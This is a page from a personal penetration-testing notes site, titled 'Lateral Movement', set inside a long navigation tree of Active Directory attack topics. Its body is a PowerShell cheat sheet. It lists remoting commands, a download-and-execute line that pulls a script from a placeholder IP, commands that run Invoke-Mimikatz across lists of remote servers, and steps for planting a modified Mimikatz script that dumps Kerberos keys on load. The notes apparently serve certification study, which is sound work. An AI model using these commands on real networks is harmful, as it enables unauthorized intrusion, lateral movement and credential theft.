👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • Connect to machine with administrator privs
  • Save and use sessions of a machine
  • Connect to machine with administrator privs
  • Execute commands on a machine
  • Load script on a machine
  • Download and load script on a machine
  • Execute locally loaded function on a list of remote machines
  • Check the language mode
  • Enumerate AppLocker policy
  • Copy script to other server
  1. WINDOWS
  2. Lateral Movement & Pivoting

Lateral Movement

Connect to machine with administrator privs

Enter-PSSession -Computername <computername>

Save and use sessions of a machine

$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Connect to machine with administrator privs

Enter-PSSession -Computername <computername>
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Execute commands on a machine

Invoke-Command -Computername <computername> -Scriptblock {whoami} 
Invoke-Command -Scriptblock {whoami} $sess

Load script on a machine

Invoke-Command -Computername <computername> -FilePath <path>
Invoke-Command -FilePath <path> $sess

Download and load script on a machine

iex (iwr http://xx.xx.xx.xx/<scriptname> -UseBasicParsing)

Execute locally loaded function on a list of remote machines

Invoke-Command -Scriptblock ${function:<function>} -Computername (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Computername (Get-Content <list_of_servers>)

Check the language mode

$ExecutionContext.SessionState.LanguageMode

Enumerate AppLocker policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Copy script to other server

This is a modified MimiKatz script to execute on load.

Copy-Item .\Invoke-MimikatzEx.ps1 \\<servername>\c$\'Program Files'

To make the modified Mimikatz.ps1 simply duplicate your original mimikatz.ps1 and rename it something like above MimiKatzEX.ps1 and add this to the bottom of the script, after the last }

Invoke-Mimikatz–Command '"sekurlsa::ekeys
PreviousLateral Movement & PivotingNextPowerShell Remoting

Last updated 2 years ago

🔴